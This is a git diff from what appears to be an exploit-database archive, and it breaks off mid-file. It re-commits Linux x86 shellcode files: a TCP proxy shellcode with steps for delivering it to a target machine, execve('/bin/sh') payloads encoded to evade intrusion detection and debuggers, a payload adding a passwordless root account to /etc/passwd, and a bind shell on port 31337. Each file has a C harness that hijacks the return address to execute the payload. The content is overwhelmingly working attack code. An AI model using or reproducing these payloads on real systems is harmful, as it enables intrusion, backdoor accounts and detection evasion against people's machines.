- - - - phar[at]stonedcoder[dot]org - http://www.stonedcoder.org - http://bpp.etherdyne.net -********************************************************************/ - - - -char shellcode[] = { -//main: - "\x31\xc0" // xor %eax,%eax - "\x89\xc3" // mov %eax,%ebx - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\x89\xc7" // mov %eax,%edi - "\x43" // inc %ebx - "\xcd\x80" // int $0x80 ;socket - - "\x89\xc6" // mov %eax,%esi - "\x89\xf8" // mov %edi,%eax - "\x31\xd2" // xor %edx,%edx - "\x52" // push %edx - "\x52" // push %edx - "\x52" // push %edx - "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info - "\xf7\xd2" // not %edx - "\x52" // push %edx - "\x89\xe1" // mov %esp,%ecx - "\x31\xd2" // xor %edx,%edx - "\xb2\x10" // mov $0x10,%dl - "\x52" // push %edx - "\x51" // push %ecx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xcd\x80" // int $0x80 ;bind - - "\x53" // push %ebx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xb3\x04" // mov $0x4,%bl - "\xcd\x80" // int $0x80 ;listen - - "\x31\xc9" // xor %ecx,%ecx - "\x41" // inc %ecx - "\xb3\x11" // mov $0x11,%bl - "\xb0\x30" // mov $0x30,%al - "\xcd\x80" // int $0x80 ;signal - -//do_next_accept: - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x50" // push %eax - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\x89\xc2" // mov %eax,%edx - "\xb3\x05" // mov $0x5,%bl - "\xcd\x80" // int $0x80 ;accept - - "\x89\xc7" // mov %eax,%edi - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\x40" // inc %eax - "\x50" // push %eax - "\xcd\x80" // int $0x80 ;fork - - "\x85\xc0" // test %eax,%eax - "\x75\xe2" // jne 8048398 - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\x89\xc3" // mov %eax,%ebx - "\xb3\x01" // mov $0x1,%bl - "\xcd\x80" 
// int $0x80 ;socket - - "\x89\xc6" // mov %eax,%esi - "\xb0\x10" // mov $0x10,%al - "\x29\xc4" // sub %eax,%esp - "\x89\xe1" // mov %esp,%ecx - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x52" // push %edx - "\x51" // push %ecx - "\x57" // push %edi - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xb3\x0a" // mov $0xa,%bl - "\xcd\x80" // int $0x80 ;recv - - - "\xb0\x66" // mov $0x66,%al - "\xb3\x03" // mov $0x3,%bl - "\x89\x34\x24" // mov %esi,(%esp) - "\xcd\x80" // int $0x80 - "\x85\xc0" // test %eax,%eax - "\x74\x14" // jz ready_to_proxy - -//close: - "\x89\xf3" // mov %esi,%ebx - "\x31\xc0" // xor %eax,%eax - "\xb0\x06" // mov $0x6,%al - "\xcd\x80" // int $0x80 ;close - - "\x87\xf7" // xchg %esi,%edi - "\x85\xc0" // test %eax,%eax - "\x74\xf" // jz close - -//exit: - "\x31\xc0" // xor %eax,%eax - "\xb0\x01" // mov $0x1,%al - "\xcd\x80" // int $0x80 ;recv - -//ready_to_proxy: - "\x31\xdb" // xor %ebx,%ebx - "\xb3\x10" // mov $0x10,%bl - "\x01\xdc" // add %ebx,%esp - "\x87\xf7" // xchg %esi,%edi - "\x31\xc0" // xor %eax,%eax - "\x50" // push %eax - "\x56" // push %esi - "\x89\xe3" // mov %esp,%ebx - "\x31\xc9" // xor %ecx,%ecx - "\x41" // inc %ecx - "\x89\xca" // mov %ecx,%edx - "\xb0\xa8" // mov $0xa8,%al - "\xcd\x80" // int $0x80 ;connect - - "\x31\xc0" // xor %eax,%eax - "\xb0\x40" // mov $0x40,%al - "\x89\xe2" // mov %esp,%edx - "\x50" // push %eax - "\xb0\x08" // mov $0x8,%al - "\x50" // push %eax - "\x52" // push %edx - "\x56" // push %esi - "\x89\xe1" // mov %esp,%ecx - "\x31\xdb" // xor %ebx,%ebx - "\xb3\x0a" // mov $0xa,%bl - -//do_next_proxy:, - "\x31\xc0" // xor %eax,%eax - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 ;send/recv - "\x85\xc0" // test %eax,%eax - "\x74\xb9" // jz close - "\x89\xda" // mov %ebx,%edx - "\xf6\xc2\x01" // test $0x1,%dl - "\x75\xc6" // jnz ready_to_proxy - -//is_recv_call: - "\x89\xc2" // mov %eax,%edx - "\xd1\xe2" // shl %edx - "\x72\xc0" // jb ready_to_proxy - "\x89\x41\x08" // mov 
%eax,0x8(%ecx) - "\x89\x39" // mov %edi,(%ecx) - "\x4b" // dec %ebx - "\xeb\xe1" // jmp do_next_proxy -}; - - -int main() { -int *ret; -char cnull = 0; - - printf("shellcode_size: %u\n", sizeof(shellcode)); - printf("contains nulls: "); - if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ - printf("yes\n"); - }else{ - printf("no\n"); - } - - ret = (int *)&ret + 2; - (*ret) = (int)shellcode; - -} - +// proxylib.c - is located at http://www.milw0rm.com/id.php?id=1476 /str0ke + +/******************************************************************** + + hey all.. this is my attempt at a very small very functional tcp + proxy shellcode.. to pull this off i ignored the "socks" protocols + and invented my own.. sorta.. + + how to use me.. + + deliver shellcode however you would normally deliver shellcode to a + machine, lets say 192.168.1.1 in this case.. + + on your machine you would setup the proxy library like so: + + phar@hatless-cat ~/proxyshell $ gcc -c -o proxyshell_connect.o proxylib.c -fpic + phar@hatless-cat ~/proxyshell $ ld -shared -o proxyshell_connect.so proxyshell_connect.o -ldl + phar@hatless-cat ~/proxyshell $ export LD_PRELOAD=/full/path/to/proxyshell_connect.so + phar@hatless-cat ~/proxyshell $ export SHELLPROXYHOST=192.168.1.16:1280 + + + from now on any calls to connect() will be proxied through the shellcode + which can handle multiple simultanious connections to arbitrary hosts. + + by default the shell binds to port 1280, you can easily modify which + the host binds to by finding the code labeled "port info" like this + + "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info + + invert the last for bytes (logical NOT) and you'll see where port + 0x5000 is declared.. adjust to whatever port you want, and reinvert.. + + + proxylib.c should be available at stonedcoder.org + + one last note about proxylib.c, it does not handle dns resolution properly, + so ip addresses only.. unless you know.. you feel like making it work.. 
+ + + + phar[at]stonedcoder[dot]org + http://www.stonedcoder.org + http://bpp.etherdyne.net +********************************************************************/ + + + +char shellcode[] = { +//main: + "\x31\xc0" // xor %eax,%eax + "\x89\xc3" // mov %eax,%ebx + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\x89\xc7" // mov %eax,%edi + "\x43" // inc %ebx + "\xcd\x80" // int $0x80 ;socket + + "\x89\xc6" // mov %eax,%esi + "\x89\xf8" // mov %edi,%eax + "\x31\xd2" // xor %edx,%edx + "\x52" // push %edx + "\x52" // push %edx + "\x52" // push %edx + "\xba\xfd\xff\xfa\xff" // mov $0xfffafffd,%edx ;port info + "\xf7\xd2" // not %edx + "\x52" // push %edx + "\x89\xe1" // mov %esp,%ecx + "\x31\xd2" // xor %edx,%edx + "\xb2\x10" // mov $0x10,%dl + "\x52" // push %edx + "\x51" // push %ecx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xcd\x80" // int $0x80 ;bind + + "\x53" // push %ebx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xb3\x04" // mov $0x4,%bl + "\xcd\x80" // int $0x80 ;listen + + "\x31\xc9" // xor %ecx,%ecx + "\x41" // inc %ecx + "\xb3\x11" // mov $0x11,%bl + "\xb0\x30" // mov $0x30,%al + "\xcd\x80" // int $0x80 ;signal + +//do_next_accept: + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x50" // push %eax + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\x89\xc2" // mov %eax,%edx + "\xb3\x05" // mov $0x5,%bl + "\xcd\x80" // int $0x80 ;accept + + "\x89\xc7" // mov %eax,%edi + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\x40" // inc %eax + "\x50" // push %eax + "\xcd\x80" // int $0x80 ;fork + + "\x85\xc0" // test %eax,%eax + "\x75\xe2" // jne 8048398 + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\x89\xc3" // mov %eax,%ebx + "\xb3\x01" // mov $0x1,%bl + "\xcd\x80" 
// int $0x80 ;socket + + "\x89\xc6" // mov %eax,%esi + "\xb0\x10" // mov $0x10,%al + "\x29\xc4" // sub %eax,%esp + "\x89\xe1" // mov %esp,%ecx + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x52" // push %edx + "\x51" // push %ecx + "\x57" // push %edi + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xb3\x0a" // mov $0xa,%bl + "\xcd\x80" // int $0x80 ;recv + + + "\xb0\x66" // mov $0x66,%al + "\xb3\x03" // mov $0x3,%bl + "\x89\x34\x24" // mov %esi,(%esp) + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x74\x14" // jz ready_to_proxy + +//close: + "\x89\xf3" // mov %esi,%ebx + "\x31\xc0" // xor %eax,%eax + "\xb0\x06" // mov $0x6,%al + "\xcd\x80" // int $0x80 ;close + + "\x87\xf7" // xchg %esi,%edi + "\x85\xc0" // test %eax,%eax + "\x74\xf" // jz close + +//exit: + "\x31\xc0" // xor %eax,%eax + "\xb0\x01" // mov $0x1,%al + "\xcd\x80" // int $0x80 ;recv + +//ready_to_proxy: + "\x31\xdb" // xor %ebx,%ebx + "\xb3\x10" // mov $0x10,%bl + "\x01\xdc" // add %ebx,%esp + "\x87\xf7" // xchg %esi,%edi + "\x31\xc0" // xor %eax,%eax + "\x50" // push %eax + "\x56" // push %esi + "\x89\xe3" // mov %esp,%ebx + "\x31\xc9" // xor %ecx,%ecx + "\x41" // inc %ecx + "\x89\xca" // mov %ecx,%edx + "\xb0\xa8" // mov $0xa8,%al + "\xcd\x80" // int $0x80 ;connect + + "\x31\xc0" // xor %eax,%eax + "\xb0\x40" // mov $0x40,%al + "\x89\xe2" // mov %esp,%edx + "\x50" // push %eax + "\xb0\x08" // mov $0x8,%al + "\x50" // push %eax + "\x52" // push %edx + "\x56" // push %esi + "\x89\xe1" // mov %esp,%ecx + "\x31\xdb" // xor %ebx,%ebx + "\xb3\x0a" // mov $0xa,%bl + +//do_next_proxy:, + "\x31\xc0" // xor %eax,%eax + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 ;send/recv + "\x85\xc0" // test %eax,%eax + "\x74\xb9" // jz close + "\x89\xda" // mov %ebx,%edx + "\xf6\xc2\x01" // test $0x1,%dl + "\x75\xc6" // jnz ready_to_proxy + +//is_recv_call: + "\x89\xc2" // mov %eax,%edx + "\xd1\xe2" // shl %edx + "\x72\xc0" // jb ready_to_proxy + "\x89\x41\x08" // mov 
%eax,0x8(%ecx) + "\x89\x39" // mov %edi,(%ecx) + "\x4b" // dec %ebx + "\xeb\xe1" // jmp do_next_proxy +}; + + +int main() { +int *ret; +char cnull = 0; + + printf("shellcode_size: %u\n", sizeof(shellcode)); + printf("contains nulls: "); + if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ + printf("yes\n"); + }else{ + printf("no\n"); + } + + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; + +} + // milw0rm.com [2006-02-07] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13382.c b/platforms/lin_x86/shellcode/13382.c index 8654278e1..52f2becd6 100755 --- a/platforms/lin_x86/shellcode/13382.c +++ b/platforms/lin_x86/shellcode/13382.c 
@@ -1,78 +1,78 @@
-/*
-[N] Shell : shellcodez
-
-Arch:x86
-Platform:linux
-Size:40
-Description:
-The shellcode to execute /bin/sh;
-This shellcode is anti-ids
-It not containz encoding engine but it
-not contain standart signatures as:
- "\xcd\x80"
- '\bin\sh'
-Tested on Slackware 10.0
-
-Coded by [NicatiN]
-http://nshell.h15.ru
-n_shell@mail.ru
-
-
-source:
-cdq
-push edx
-pop eax
-push edx
-mov edi,876189623
-add edi,edi
-push edi
-mov edi,884021143
-add edi,edi
-inc edi
-push edi
-mov ebx,esp
-push edx
-push ebx
-mov ecx,esp
-mov al,99
-sub al,88
-sub edi,1768009314
-push edi
-call esp
-
-dizasm:
-8048080: 99 cltd
-8048081: 52 push %edx
-8048082: 58 pop %eax
-8048083: 52 push %edx
-8048084: bf b7 97 39 34 mov $0x343997b7,%edi
-8048089: 01 ff add %edi,%edi
-804808b: 57 push %edi
-804808c: bf 97 17 b1 34 mov $0x34b11797,%edi
-8048091: 01 ff add %edi,%edi
-8048093: 47 inc %edi
-8048094: 57 push %edi
-8048095: 89 e3 mov %esp,%ebx
-8048097: 52 push %edx
-8048098: 53 push %ebx
-8048099: 89 e1 mov %esp,%ecx
-804809b: b0 63 mov $0x63,%al
-804809d: 2c 58 sub $0x58,%al
-804809f: 81 ef 62 ae 61 69 sub $0x6961ae62,%edi
-80480a5: 57 push %edi
-80480a6: ff d4 call *%esp
-
-*/
-
-char sc[]=
-"\x99\x52\x58\x52\xbf\xb7\x97\x39\x34\x01\xff\x57\xbf\x97\x17\xb1"
-"\x34\x01\xff\x47\x57\x89\xe3\x52\x53\x89\xe1\xb0\x63\x2c\x58\x81"
-"\xef\x62\xae\x61\x69\x57\xff\xd4";
-
-int main()
-{
- int (*f)() = (int (*)())sc;
- f();
-}
-
+/*
+[N] Shell : shellcodez
+
+Arch:x86
+Platform:linux
+Size:40
+Description:
+The shellcode to execute /bin/sh;
+This shellcode is anti-ids
+It not containz encoding engine but it
+not contain standart signatures as:
+ "\xcd\x80"
+ '\bin\sh'
+Tested on Slackware 10.0
+
+Coded by [NicatiN]
+http://nshell.h15.ru
+n_shell@mail.ru
+
+
+source:
+cdq
+push edx
+pop eax
+push edx
+mov edi,876189623
+add edi,edi
+push edi
+mov edi,884021143
+add edi,edi
+inc edi
+push edi
+mov ebx,esp
+push edx
+push ebx
+mov ecx,esp
+mov al,99
+sub al,88
+sub edi,1768009314
+push edi
+call esp
+
+dizasm:
+8048080: 99 cltd
+8048081: 52 push %edx
+8048082: 58 pop %eax
+8048083: 52 push %edx
+8048084: bf b7 97 39 34 mov $0x343997b7,%edi
+8048089: 01 ff add %edi,%edi
+804808b: 57 push %edi
+804808c: bf 97 17 b1 34 mov $0x34b11797,%edi
+8048091: 01 ff add %edi,%edi
+8048093: 47 inc %edi
+8048094: 57 push %edi
+8048095: 89 e3 mov %esp,%ebx
+8048097: 52 push %edx
+8048098: 53 push %ebx
+8048099: 89 e1 mov %esp,%ecx
+804809b: b0 63 mov $0x63,%al
+804809d: 2c 58 sub $0x58,%al
+804809f: 81 ef 62 ae 61 69 sub $0x6961ae62,%edi
+80480a5: 57 push %edi
+80480a6: ff d4 call *%esp
+
+*/
+
+char sc[]=
+"\x99\x52\x58\x52\xbf\xb7\x97\x39\x34\x01\xff\x57\xbf\x97\x17\xb1"
+"\x34\x01\xff\x47\x57\x89\xe3\x52\x53\x89\xe1\xb0\x63\x2c\x58\x81"
+"\xef\x62\xae\x61\x69\x57\xff\xd4";
+
+int main()
+{
+ int (*f)() = (int (*)())sc;
+ f();
+}
+
 // milw0rm.com [2006-01-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13383.c b/platforms/lin_x86/shellcode/13383.c
index 0febc7054..5e563bb53 100755
--- a/platforms/lin_x86/shellcode/13383.c
+++ b/platforms/lin_x86/shellcode/13383.c
@@ -1,42 +1,42 @@
-/*
- * (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes
- *
- * The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and
- * the attacked machine. So if a 3rd party side would try to run this shellcode and would produce
- * a different CPUID output (e.g. different arch) the shellcode won't work. In addition this also
- * prevents from having the '/bin/sh' string visible on the wire.
- *
- * The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID
- *
- * - izik
- */
-
-char shellcode[] =
-
- "\x31\xc0" // xor %eax,%eax
- "\x0f\xa2" // cpuid
- "\x51" // push %ecx
- "\x68\xe7\x95\xa8\xec" // push $0xeca895e7
- "\x68\xde\x7f\x37\x3f" // push $0x3f377fde
- "\x68\x07\x1a\xec\x8f" // push $0x8fec1a07
- "\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e
- "\x68\x06\x5b\x16\x04" // push $0x04165b06
-
- //
- // <_unpack_loop>:
- //
-
- "\x31\x0c\x24" // xor %ecx,(%esp)
- "\x5a" // pop %edx
- "\x75\xfa" // jne <_unpack_loop>
- "\x83\xec\x18" // sub $0x18,%esp
- "\x54" // push %esp
- "\xc3"; // ret
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes
+ *
+ * The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and
+ * the attacked machine. So if a 3rd party side would try to run this shellcode and would produce
+ * a different CPUID output (e.g. different arch) the shellcode won't work. In addition this also
+ * prevents from having the '/bin/sh' string visible on the wire.
+ *
+ * The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID
+ *
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x31\xc0" // xor %eax,%eax
+ "\x0f\xa2" // cpuid
+ "\x51" // push %ecx
+ "\x68\xe7\x95\xa8\xec" // push $0xeca895e7
+ "\x68\xde\x7f\x37\x3f" // push $0x3f377fde
+ "\x68\x07\x1a\xec\x8f" // push $0x8fec1a07
+ "\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e
+ "\x68\x06\x5b\x16\x04" // push $0x04165b06
+
+ //
+ // <_unpack_loop>:
+ //
+
+ "\x31\x0c\x24" // xor %ecx,(%esp)
+ "\x5a" // pop %edx
+ "\x75\xfa" // jne <_unpack_loop>
+ "\x83\xec\x18" // sub $0x18,%esp
+ "\x54" // push %esp
+ "\xc3"; // ret
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-25]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13384.c b/platforms/lin_x86/shellcode/13384.c
index a86b25724..dcc6dd50c 100755
--- a/platforms/lin_x86/shellcode/13384.c
+++ b/platforms/lin_x86/shellcode/13384.c
@@ -1,34 +1,34 @@
-/*
- * (linux/x86) - execve("/bin/sh", ["/bin/sh"], NULL) / encoded by +1 - 39 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x68\x8a\xe2\xce\x81" // push $0x81cee28a
- "\x68\xb1\x0c\x53\x54" // push $0x54530cb1
- "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a
- "\x68\x01\x69\x30\x63" // push $0x63306901
- "\x68\x69\x30\x74\x69" // push $0x69743069
- "\x6a\x14" // push $0x14
- "\x59" // pop %ecx
-
- //
- // <_unpack_loop>:
- //
-
- "\xfe\x0c\x0c" // decb (%esp,%ecx,1)
- "\x49" // dec %ecx
- "\x79\xfa" // jns <_unpack_loop>
- "\x41" // inc %ecx
- "\xf7\xe1" // mul %ecx
- "\x54" // push %esp
- "\xc3"; // ret
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) - execve("/bin/sh", ["/bin/sh"], NULL) / encoded by +1 - 39 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x68\x8a\xe2\xce\x81" // push $0x81cee28a
+ "\x68\xb1\x0c\x53\x54" // push $0x54530cb1
+ "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a
+ "\x68\x01\x69\x30\x63" // push $0x63306901
+ "\x68\x69\x30\x74\x69" // push $0x69743069
+ "\x6a\x14" // push $0x14
+ "\x59" // pop %ecx
+
+ //
+ // <_unpack_loop>:
+ //
+
+ "\xfe\x0c\x0c" // decb (%esp,%ecx,1)
+ "\x49" // dec %ecx
+ "\x79\xfa" // jns <_unpack_loop>
+ "\x41" // inc %ecx
+ "\xf7\xe1" // mul %ecx
+ "\x54" // push %esp
+ "\xc3"; // ret
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-25]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13385.c b/platforms/lin_x86/shellcode/13385.c
index b3ff921ce..e9acf632e 100755
--- a/platforms/lin_x86/shellcode/13385.c
+++ b/platforms/lin_x86/shellcode/13385.c
@@ -1,41 +1,41 @@
-/*
- * (linux/x86) adds user 'xtz' without password to /etc/passwd - 59 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x05" // push $0x5
-
- //
- // <_exit>:
- //
-
- "\x58" // pop %eax
- "\x99" // cltd
- "\x31\xc9" // xor %ecx,%ecx
- "\x66\xb9\x01\x04" // mov $0x401,%cx
- "\x52" // push %edx
- "\x68\x73\x73\x77\x64" // push $0x64777373
- "\x68\x63\x2f\x70\x61" // push $0x61702f63
- "\x68\x2f\x2f\x65\x74" // push $0x74652f2f
- "\x89\xe3" // mov %esp,%ebx
- "\xcd\x80" // int $0x80
- "\x68\x3a\x3a\x3a\x0a" // push $0xa3a3a3a
- "\x68\x3a\x30\x3a\x30" // push $0x303a303a
- "\x68\x78\x74\x7a\x3a" // push $0x3a7a7478
- "\x89\xc3" // mov %eax,%ebx
- "\xb0\x04" // mov $0x4,%al
- "\x89\xe1" // mov %esp,%ecx
- "\xb2\x0c" // mov $0xc,%dl
- "\xcd\x80" // int $0x80
- "\x6a\x01" // push $0x1
- "\xeb\xc7"; // jmp <_exit>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) adds user 'xtz' without password to /etc/passwd - 59 bytes
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x05" // push $0x5
+
+ //
+ // <_exit>:
+ //
+
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x66\xb9\x01\x04" // mov $0x401,%cx
+ "\x52" // push %edx
+ "\x68\x73\x73\x77\x64" // push $0x64777373
+ "\x68\x63\x2f\x70\x61" // push $0x61702f63
+ "\x68\x2f\x2f\x65\x74" // push $0x74652f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80" // int $0x80
+ "\x68\x3a\x3a\x3a\x0a" // push $0xa3a3a3a
+ "\x68\x3a\x30\x3a\x30" // push $0x303a303a
+ "\x68\x78\x74\x7a\x3a" // push $0x3a7a7478
+ "\x89\xc3" // mov %eax,%ebx
+ "\xb0\x04" // mov $0x4,%al
+ "\x89\xe1" // mov %esp,%ecx
+ "\xb2\x0c" // mov $0xc,%dl
+ "\xcd\x80" // int $0x80
+ "\x6a\x01" // push $0x1
+ "\xeb\xc7"; // jmp <_exit>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13386.c b/platforms/lin_x86/shellcode/13386.c
index 8102042af..703e02c08 100755
--- a/platforms/lin_x86/shellcode/13386.c
+++ b/platforms/lin_x86/shellcode/13386.c
@@ -1,54 +1,54 @@
-/*
- * (linux/x86) anti-debug trick (INT 3h trap) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 39 bytes
- *
- * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS
- * would try to x86-emulate the shellcode it would *glitch* and fail. This also protectes the shellcode
- * from running within a debugger environment such as gdb and strace.
- *
- * How this works? the shellcode registers for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it
- * to call the acutal payload (e.g. _evil_code) while a greedy debugger or a confused x86-emu won't pass
- * the signal handler to the shellcode, it would end up doing _exit() instead execuve()
- *
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x30" // push $0x30
- "\x58" // pop %eax
- "\x6a\x05" // push $0x5
- "\x5b" // pop %ebx
- "\xeb\x05" // jmp <_evil_code>
-
- //
- // <_evilcode_loc>:
- //
-
- "\x59" // pop %ecx
- "\xcd\x80" // int $0x80
- "\xcc" // int3
- "\x40" // inc %eax
- "\xe8\xf6\xff\xff\xff" // call <_evilcode_loc>
- "\x99" // cltd
-
- //
- // <_evil_code>:
- //
-
- "\xb0\x0b" // mov $0xb,%al
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x54" // push %esp
- "\xeb\xe1"; // jmp <_evilcode_loc>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) anti-debug trick (INT 3h trap) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 39 bytes
+ *
+ * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS
+ * would try to x86-emulate the shellcode it would *glitch* and fail. This also protectes the shellcode
+ * from running within a debugger environment such as gdb and strace.
+ *
+ * How this works? the shellcode registers for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it
+ * to call the acutal payload (e.g. _evil_code) while a greedy debugger or a confused x86-emu won't pass
+ * the signal handler to the shellcode, it would end up doing _exit() instead execuve()
+ *
+ * - izik
+ */
+
+char shellcode[] =
+
+ "\x6a\x30" // push $0x30
+ "\x58" // pop %eax
+ "\x6a\x05" // push $0x5
+ "\x5b" // pop %ebx
+ "\xeb\x05" // jmp <_evil_code>
+
+ //
+ // <_evilcode_loc>:
+ //
+
+ "\x59" // pop %ecx
+ "\xcd\x80" // int $0x80
+ "\xcc" // int3
+ "\x40" // inc %eax
+ "\xe8\xf6\xff\xff\xff" // call <_evilcode_loc>
+ "\x99" // cltd
+
+ //
+ // <_evil_code>:
+ //
+
+ "\xb0\x0b" // mov $0xb,%al
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x54" // push %esp
+ "\xeb\xe1"; // jmp <_evilcode_loc>
+
+int main(int argc, char **argv) {
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int) shellcode;
+}
+
 // milw0rm.com [2006-01-21]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13387.c b/platforms/lin_x86/shellcode/13387.c
index 91be3d8e3..3c4db19e4 100755
--- a/platforms/lin_x86/shellcode/13387.c
+++ b/platforms/lin_x86/shellcode/13387.c
@@ -1,71 +1,71 @@
-/*
- * (linux/x86) bind '/bin/sh' to 31337/tcp - 80 bytes
- * - izik
- */
-
-char shellcode[] =
-
- "\x6a\x66" // push $0x66
- "\x58" // pop %eax
- "\x99" // cltd
- "\x6a\x01" // push $0x1
- "\x5b" // pop %ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x6a\x02" // push $0x2
-
- //
- // <_doint>:
- //
-
- "\x89\xe1" // mov %esp,%ecx
- "\xcd\x80" // int $0x80
-
- "\x5b" // pop %ebx
- "\x5d" // pop %ebp
- "\x52" // push %edx
- "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
- "\x0f\xcd" // bswap %ebp
- "\x09\xdd" // or %ebx,%ebp
- "\x55" // push %ebp
- "\x6a\x10" // push $0x10
- "\x51" // push %ecx
- "\x50" // push %eax
- "\x89\xe1" // mov %esp,%ecx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\xb3\x04" // mov $0x4,%bl
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\x89\x64\x24\x08" // mov %esp,0x8(%esp)
- "\x43" // inc %ebx
- "\xb0\x66" // mov $0x66,%al
- "\xcd\x80" // int $0x80
- "\x93" // xchg %eax,%ebx
- "\x59" // pop %ecx
-
- //
- // <_dup2loop>:
- //
-
- "\xb0\x3f" // mov $0x3f,%al
- "\xcd\x80" // int $0x80
- "\x49" // dec %ecx
- "\x79\xf9" // jns <_dup2loop>
-
- "\xb0\x0b" // mov $0xb,%al
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp,%ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\xeb\xbb"; // jmp <_doint>
-
-int main(int argc, char **argv) {
- int *ret;
- ret = (int *)&ret + 2;
- (*ret) = (int) shellcode;
-}
-
+/*
+ * (linux/x86) bind '/bin/sh' to 31337/tcp - 80 bytes
